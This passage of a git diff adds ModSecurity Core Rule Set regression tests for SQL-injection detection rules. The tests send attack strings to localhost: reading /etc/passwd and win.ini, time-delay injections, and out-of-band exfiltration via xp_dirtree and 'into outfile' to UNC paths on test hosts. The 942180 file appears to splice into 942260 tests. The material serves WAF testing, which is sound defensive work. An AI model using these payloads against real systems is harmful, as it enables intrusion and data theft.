input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "benchmark(3000000,M%445(4)" + version: HTTP/1.0 + output: + log_contains: id "942160" + - test_title: 942160-8 + desc: "SQL Injection Attack: Common DB Names Detected" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay=BENCHMARK(1000000, md5\" AND 1883=1883-- GSCC('')" + version: HTTP/1.0 + output: + log_contains: id "942160" + - test_title: 942160-9 + desc: "SQL Injection Attack: Common DB Names Detected" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "pay=BeNChMaRK(1000000, md5 AND 9796=4706('')" + version: HTTP/1.0 + output: + log_contains: id "942160" diff --git a/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942180.yaml b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942180.yaml new file mode 100644 index 000000000..937665bf3 --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942180.yaml 
@@ -0,0 +1,37 @@ +--- +meta: + author: "Christian S.J. Peron" + description: None + enabled: true + name: 942180.yaml +tests: + - test_title: 942180-1 + desc: "basic SQL authentication bypass" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: GET + port: 80 + # something simple like 3' ' 1 + uri: "/?var=3%27%20%27%201" + version: HTTP/1.0 + output: + log_contains: id "942180" + - test_title: 942180-2 + desc: "XSS test based on portswigger XSS cheatsheet" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + version: HTTP/1.0 + data: "javascript:\"/*'/*`/*-->%ptkjp;" + version: HTTP/1.0 + output: + log_contains: id "942260" + - test_title: 942260-7 + desc: "Embedded shell execution" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "var=` /bin/cat /etc/passwd`" + version: HTTP/1.0 + output: + log_contains: id "942260" + - test_title: 942260-8 + desc: "Embedded shell execution" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "var=0.84622338492032948`echo${IFS}crs312``echo${IFS}34test`" + version: HTTP/1.0 + output: + log_contains: id "942260" + - test_title: 942260-9 + desc: "Embedded shell execution" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "var=`echo crs312``echo 34test`" + version: HTTP/1.0 + output: + log_contains: id "942260" + - test_title: 942260-10 + desc: "Embedded shell execution" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "var=123-456-01@coreruleset.org'|ping -c 1337 127.0.0.1 #" + version: HTTP/1.0 + output: + log_contains: id "942260" + - test_title: 942260-11 + desc: "Advanced embedded shell execution" + stages: + - stage: + 
input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "var=1);declare @q varchar(99);set @q='\\\\j0kwbatxjfgjp0qu3ibonwovamgmkq8h05unittests.corerule' 'set.org\\kph'; exec master.dbo.xp_dirtree @q;--" + version: HTTP/1.0 + output: + log_contains: id "942260" + - test_title: 942260-12 + desc: "Advanced embedded shell execution" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "var=content.ini);declare @q varchar(99);set @q='\\\\i1kvc9uwkehiqzrt4hcnovpublhunittests.corerule' 'set.org\\lri'; exec master.dbo.xp_dirtree @q;--" + version: HTTP/1.0 + output: + log_contains: id "942260" + - test_title: 942260-13 + desc: "Advanced embedded shell execution" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "var=EmptyValue', '4', '2', '7');declare @q varchar(99);set @q='\\\\h5nug8yvodlhuyvs8ggmsuttfklkcjunittests.corerule'+'set.org\\vcr'; exec master.dbo.xp_dirtree @q;--" + version: HTTP/1.0 + output: + log_contains: id "942260" + - test_title: 942260-14 + desc: "Advanced embedded shell execution" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "var=test));declare @q varchar(99);set @q='\\\\zwzc7qpdfvczlgmazy74jckb62cunittests.corrule'+'set.org\\gej'; exec master.dbo.xp_dirtree @q;--" + version: HTTP/1.0 + output: + log_contains: id "942260" + - test_title: 942260-15 + desc: "Advanced embedded shell execution" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "var=/config.ini' into outfile '\\\\\\\\il7vw9ew4e1iazbtohwn8v9uvl1hunitetests.coreruleset.org\\\\yxq'; --" + version: HTTP/1.0 + output: + log_contains: id "942260" + - test_title: 942260-16 + desc: "Advanced embedded shell execution" + stages: + - stage: + input: + 
dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "var=EmptyValue into outfile '\\\\\\\\jviw6aoxefbjk0luyi6oiwjv5unittests.coreruleset.org\\\\xct'; --" + version: HTTP/1.0 + output: + log_contains: id "942260" + - test_title: 942260-17 + desc: "Advanced embedded shell execution" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "var=test@coreruleset.org\"|type %SYSTEMROOT%\\win.ini" + version: HTTP/1.0 + output: + log_contains: id "942260" + - test_title: 942260-18 + desc: "Traces of XSS" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "var=mytest>'>\">" + version: HTTP/1.0 + output: + log_contains: id "942260" + - test_title: 942260-19 + desc: "Advanced SQL authentication bypass" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "var=\"123-456-123@coreruleset.org\"' and (select*from(select(sleep(10)))a)--" + version: HTTP/1.0 + output: + log_contains: id "942260" + - test_title: 942260-20 + desc: "Advanced embedded shell execution" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "var=\"tester@coreruleset.org\"' waitfor delay'0:0:20'--" + version: HTTP/1.0 + output: + log_contains: id "942260" + - test_title: 942260-21 + desc: "Advanced embedded shell execution" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "var=\"-->'-->`-->" + version: HTTP/1.0 + output: + log_contains: id "942260" + - test_title: 942260-22 + desc: "Traces of XSS" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "var='\">" + version: HTTP/1.0 + output: + log_contains: id "942260" 
diff --git a/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942270.yaml b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942270.yaml
new file mode 100644
index 000000000..4ca250431
--- /dev/null
+++ b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942270.yaml
@@ -0,0 +1,21 @@
+---
+meta:
+ author: "Christian S.J. Peron"
+ description: None
+ enabled: true
+ name: 942270.yaml
+tests:
+ - test_title: 942270-1
+ desc: "basic sql injection. Common attack string for mysql, oracle and others"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ method: GET
+ port: 80
+ uri: "/?var=union%20select%20col%20from"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942270"
diff --git a/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942280.yaml b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942280.yaml
new file mode 100644
index 000000000..9b123be7c
--- /dev/null
+++ b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942280.yaml
@@ -0,0 +1,21 @@
+---
+meta:
+ author: "Christian S.J. Peron"
+ description: None
+ enabled: true
+ name: 942280.yaml
+tests:
+ - test_title: 942280-1
+ desc: "Postgres pg_sleep injection, waitfor delay attacks and database shutdown attempts"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ method: GET
+ port: 80
+ uri: "/?var=select%20pg_sleep"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942280"
diff --git a/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942290.yaml b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942290.yaml
new file mode 100644
index 000000000..a14e15a2a
--- /dev/null
+++ b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942290.yaml
@@ -0,0 +1,35 @@
+---
+meta:
+ author: csanders-git
+ description: None
+ enabled: true
+ name: 942290.yaml
+tests:
+ - test_title: 942290-1
+ desc: Test as described in http://www.client9.com/article/five-interesting-injection-attacks/
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ method: GET
+ port: 80
+ uri: /mongo/show.php?u_id[$ne]=2
+ headers:
+ User-Agent: ModSecurity CRS 3 Tests
+ Host: localhost
+ output:
+ log_contains: id "942290"
+ - test_title: 942290-2
+ desc: "basic MongoDB SQL injection attempts"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ method: GET
+ port: 80
+ uri: "/?mongoQ=%5b%24lte%5dasdfsd"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942290"
diff --git a/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942300.yaml b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942300.yaml
new file mode 100644
index 000000000..8f9f694a8
--- /dev/null
+++ b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942300.yaml
@@ -0,0 +1,21 @@
+---
+meta:
+ author: "Christian S.J. Peron"
+ description: None
+ enabled: true
+ name: 942300.yaml
+tests:
+ - test_title: 942300-1
+ desc: "MySQL comments, conditions and ch(a)r injectionss"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ method: POST
+ port: 80
+ data: "var=) when 234 then&foo=bar"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942300"
diff --git a/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942310.yaml b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942310.yaml
new file mode 100644
index 000000000..ebc6d8f40
--- /dev/null
+++ b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942310.yaml
@@ -0,0 +1,21 @@
+---
+meta:
+ author: "Christian S.J. Peron"
+ description: None
+ enabled: true
+ name: 942310.yaml
+tests:
+ - test_title: 942310-1
+ desc: "chained SQL injection attempts 2/2"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ method: GET
+ port: 80
+ uri: "/?var=%22%27%20and%20%3d%20bar"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942310"
diff --git a/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942320.yaml b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942320.yaml
new file mode 100644
index 000000000..09911991f
--- /dev/null
+++ b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942320.yaml
@@ -0,0 +1,66 @@
+---
+meta:
+ author: "Christian S.J. Peron, Christoph Hansen"
+ description: None
+ enabled: true
+ name: 942320.yaml
+tests:
+ - test_title: 942320-1
+ desc: "Detects MySQL and PostgreSQL stored procedure/function injections"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ method: POST
+ port: 80
+ data: "var=procedure%20analyse%20%28"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942320"
+ - test_title: 942320-2
+ desc: "Detects MySQL and PostgreSQL stored procedure/function injections"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ method: POST
+ port: 80
+ uri: "/"
+ data: "pay=exec+%28%40%0A"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942320"
+ - test_title: 942320-3
+ desc: "Detects MySQL and PostgreSQL stored procedure/function injections"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ method: POST
+ port: 80
+ uri: "/"
+ data: "pay=declare+%40b%0A"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942320"
+ - test_title: 942320-4
+ desc: "Detects MySQL and PostgreSQL stored procedure/function injections"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ method: POST
+ port: 80
+ uri: "/"
+ data: "pay=DECLARE%2F%2A%2A%2F%40x%0A"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942320"
diff --git a/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942330.yaml b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942330.yaml
new file mode 100644
index 000000000..e82bf5ce2
--- /dev/null
+++ b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942330.yaml
@@ -0,0 +1,21 @@
+---
+meta:
+ author: "Christian S.J. Peron"
+ description: None
+ enabled: true
+ name: 942330.yaml
+tests:
+ - test_title: 942330-1
+ desc: "classic SQL injection probings 1/3"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ method: POST
+ port: 80
+ data: "var=%22%27&var2=whatever"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942330"
diff --git a/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942340.yaml b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942340.yaml
new file mode 100644
index 000000000..355edef41
--- /dev/null
+++ b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942340.yaml
@@ -0,0 +1,22 @@
+---
+meta:
+ author: "Christian S.J. Peron"
+ description: None
+ enabled: true
+ name: 942340.yaml
+tests:
+ - test_title: 942340-1
+ desc: "basic SQL authentication bypass attempts 3/3"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ method: GET
+ port: 80
+ # in ( select * from
+ uri: "/?var=in%20%28%20select%20%2a%20from"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942340"
diff --git a/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942350.yaml b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942350.yaml
new file mode 100644
index 000000000..39c372051
--- /dev/null
+++ b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942350.yaml
@@ -0,0 +1,37 @@
+---
+meta:
+ author: "Christian S.J. Peron, Franziska Bühler"
+ description: None
+ enabled: true
+ name: 942350.yaml
+tests:
+ - test_title: 942350-1
+ desc: "MySQL UDF injection and other data/structure manipulation"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ method: GET
+ port: 80
+ # ; insert INTO table (word) VALUES('dfsd')
+ uri: "/?var=%3bINSERT%20INTO%20table%20%28col%29%20VALUES"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942350"
+ - test_title: 942350-2
+ desc: "Fix for FP reported in GitHub issue 1587"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ method: GET
+ port: 80
+ # ;insertion_424242
+ uri: "/?var=%3Binsertion_424242"
+ version: HTTP/1.0
+ output:
+ no_log_contains: id "942350"
diff --git a/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942360.yaml b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942360.yaml
new file mode 100644
index 000000000..5f3677241
--- /dev/null
+++ b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942360.yaml
@@ -0,0 +1,493 @@ +--- +meta: + author: "Christian S.J. Peron, Christoph Hansen, Franziska Buehler" + description: None + enabled: true + name: 942360.yaml +tests: + - test_title: 942360-1 + desc: "concatenated basic SQL injection and SQLLFI" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + # 23423 as "sdfsdfs" FROM table + data: "var=1234%20AS%20%22foobar%22%20FROM%20tablevar2=whatever" + version: HTTP/1.0 + output: + log_contains: id "942360" + - test_title: 942360-2 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "select Char(" + version: HTTP/1.0 + output: + log_contains: id "942360" + - test_title: 942360-3 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "SELECT CHAR(" + version: HTTP/1.0 + output: + log_contains: id "942360" + - test_title: 942360-4 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "SELECT GROUP_CONCAT(" + version: HTTP/1.0 + output: + log_contains: id "942360" + - test_title: 942360-5 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "SELECT group_cOnCat(" + version: HTTP/1.0 + output: + log_contains: id "942360" + - test_title: 942360-6 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: ") as cc FROM" + version: HTTP/1.0 + output: + log_contains: id 
"942360" + - test_title: 942360-7 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: ") AS orders FROM" + version: HTTP/1.0 + output: + log_contains: id "942360" + - test_title: 942360-8 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: ") AS `carrier_id` from" + version: HTTP/1.0 + output: + log_contains: id "942360" + - test_title: 942360-9 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "select load_file(" + version: HTTP/1.0 + output: + log_contains: id "942360" + - test_title: 942360-10 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: ") AS Role FROM" + version: HTTP/1.0 + output: + log_contains: id "942360" + - test_title: 942360-11 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "` AS `edit_user_id` from" + version: HTTP/1.0 + output: + log_contains: id "942360" + - test_title: 942360-12 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: ") AS val FROM" + version: HTTP/1.0 + output: + log_contains: id "942360" + - test_title: 942360-13 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: 
localhost + method: POST + port: 80 + uri: "/" + data: "pay=%60+REGEXP%20" + version: HTTP/1.0 + output: + log_contains: id "942360" + - test_title: 942360-14 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: ") AS 'Durchschnitt_Importzeit' FROM" + version: HTTP/1.0 + output: + log_contains: id "942360" + - test_title: 942360-15 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "` AS `OXTIMESTAMP` from" + version: HTTP/1.0 + output: + log_contains: id "942360" + - test_title: 942360-16 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: ") as col_0_0_ from" + version: HTTP/1.0 + output: + log_contains: id "942360" + - test_title: 942360-17 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: ") AS `count` FROM" + version: HTTP/1.0 + output: + log_contains: id "942360" + - test_title: 942360-18 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: ") AS schlagwoerter FROM" + version: HTTP/1.0 + output: + log_contains: id "942360" + - test_title: 942360-19 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: ") as User from" + version: HTTP/1.0 + output: + log_contains: id "942360" + - test_title: 942360-20 
+ desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: ") AS t FROM" + version: HTTP/1.0 + output: + log_contains: id "942360" + - test_title: 942360-21 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "(load_file(" + version: HTTP/1.0 + output: + log_contains: id "942360" + - test_title: 942360-22 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: ") as ExecuteTheseSQLCommands FROM" + version: HTTP/1.0 + output: + log_contains: id "942360" + - test_title: 942360-23 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: ") AS schlagwoerter FROM" + version: HTTP/1.0 + output: + log_contains: id "942360" + - test_title: 942360-24 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "` AS `documentType` FROM" + version: HTTP/1.0 + output: + log_contains: id "942360" + - test_title: 942360-25 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "! 
As' from" + version: HTTP/1.0 + output: + log_contains: id "942360" + - test_title: 942360-26 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "; As not from" + version: HTTP/1.0 + output: + log_contains: id "942360" + - test_title: 942360-27 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "SELECT load_file(" + version: HTTP/1.0 + output: + log_contains: id "942360" + - test_title: 942360-28 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: "6 As\" from" + version: HTTP/1.0 + output: + log_contains: id "942360" + - test_title: 942360-29 + desc: "Detects concatenated basic SQL injection and SQLLFI attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + method: POST + port: 80 + uri: "/" + data: ") as day1 FROM" + version: HTTP/1.0 + output: + log_contains: id "942360" + - test_title: 942360-30 + desc: GH issue 1580 + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + method: POST + port: 80 + uri: / + data: ", aside from" + version: HTTP/1.0 + output: + no_log_contains: id "942360" + - test_title: 942360-31 + desc: GH issue 1605 + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: localhost + User-Agent: ModSecurity CRS 3 Tests + method: POST + port: 80 + uri: / + data: "a=/create" + version: HTTP/1.0 + output: + no_log_contains: id "942360" + - test_title: 942360-32 + desc: GH issue 1605 + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + 
Host: localhost
+ User-Agent: ModSecurity CRS 3 Tests
+ method: POST
+ port: 80
+ uri: /
+ data: "a=/CREATE TABLE Persons"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942360"
diff --git a/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942361.yaml b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942361.yaml
new file mode 100644
index 000000000..abe503a39
--- /dev/null
+++ b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942361.yaml
@@ -0,0 +1,112 @@
+---
+meta:
+ author: "Christoph Hansen"
+ description: None
+ enabled: true
+ name: 942361.yaml
+tests:
+ - test_title: 942361-1
+ desc: "Detects basic SQL injection based on keyword alter or union"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ method: POST
+ port: 80
+ uri: "/"
+ data: "'alter a"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942361"
+ - test_title: 942361-2
+ desc: "Detects basic SQL injection based on keyword alter or union"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ method: POST
+ port: 80
+ uri: "/"
+ data: "\" ALTER A"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942361"
+ - test_title: 942361-3
+ desc: "Detects basic SQL injection based on keyword alter or union"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ method: POST
+ port: 80
+ uri: "/"
+ data: "'ALTER A"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942361"
+ - test_title: 942361-4
+ desc: "Detects basic SQL injection based on keyword alter or union"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ method: POST
+ port: 80
+ uri: "/"
+ data: "' alter/"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942361"
+ - test_title: 942361-5
+ desc: "Detects basic SQL injection based on keyword alter or union"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ method: POST
+ port: 80
+ uri: "/"
+ data: "\" UNION A"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942361"
+ - test_title: 942361-6
+ desc: "Detects basic SQL injection based on keyword alter or union"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ method: POST
+ port: 80
+ uri: "/"
+ data: "'UNION A"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942361"
+ - test_title: 942361-7
+ desc: "Detects basic SQL injection based on keyword alter or union"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ method: POST
+ port: 80
+ uri: "/"
+ data: "' union/"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942361"
